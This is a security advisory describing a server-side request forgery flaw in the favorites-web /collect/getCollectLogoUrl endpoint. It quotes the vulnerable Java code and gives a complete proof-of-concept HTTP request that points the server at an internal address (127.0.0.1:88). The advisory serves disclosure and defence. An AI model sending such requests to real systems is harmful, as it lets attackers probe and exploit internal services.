SSRF vulnerability on /collect/getCollectLogoUrl

[NinjaGPT]

Summary

A SSRF vulnerability was discovered on /collect/getCollectLogoUrl in latest version (v1.3.0) of favorites-web. The target URI parameter for network requests is user-controllable and lacks sufficient security processing, resulting in an SSRF vulnerability that allows attackers to exploit this flaw to probe and exploit internal services of the target system.

Version <= v1.3.0

Details

• app/src/main/java/com/favorites/web/CollectController.java

@RequestMapping(value="/getCollectLogoUrl",method=RequestMethod.POST)
@LoggerManage(description="获取收藏页面的LogoUrl")
public String getCollectLogoUrl(String url){
    if(StringUtils.isNotBlank(url)){
       String logoUrl = cacheService.getMap(url);
       if(StringUtils.isNotBlank(logoUrl)){
          return logoUrl;
       }else{
          return Const.default_logo;
       }
    }else{
       return Const.default_logo;
    }
}

... 
public String getMap(String key){
    if(maps.isEmpty()){
       List<UrlLibrary> collectLibrarieList = urlLibraryRepository.findAll();
        for(UrlLibrary urlLibrary : collectLibrarieList){
            maps.put(urlLibrary.getUrl(), urlLibrary.getLogoUrl());
        }
    }
    if(null == maps.get(key)){
        this.addMaps(key);
    }
    return maps.get(key);
}


public void addMaps(String key){
    if(key.contains("?")){
        key=key.substring(0,key.indexOf("?"));
    }
    String logoUrl = HtmlUtil.getImge(key);
    maps.put(key,logoUrl);
    UrlLibrary urlLibrary = new UrlLibrary();
    urlLibrary.setUrl(key);
    urlLibrary.setLogoUrl(logoUrl);
    urlLibraryRepository.save(urlLibrary);
}

public static String getImge(String url){
    String logo="";
    logo=getPageImg(url);
    if(StringUtils.isBlank(logo) || logo.length()>300){
       logo=Const.BASE_PATH + Const.default_logo;
    }
    return logo;
}

• app/src/main/java/com/favorites/utils/HtmlUtil.java

public static String getPageImg(String url){
    String imgUrl="";
    Document doc;
    try {
       doc = Jsoup.connect(url).userAgent(Const.userAgent).get();
 

---

POC

POST /collect/getCollectLogoUrl HTTP/1.1
Host: 127.0.0.1:7001
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh;q=0.9,zh-CN;q=0.8
Cookie: JSESSIONID=E00E4984B9361172A607DE1C9834F555; Favorites_user=7rhpr7t/Ax3zf0kG+IpKo+Wg+1N9ozjr
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

url=http://127.0.0.1:88/

Impact

https://portswigger.net/web-security/ssrf#what-is-the-impact-of-ssrf-attacks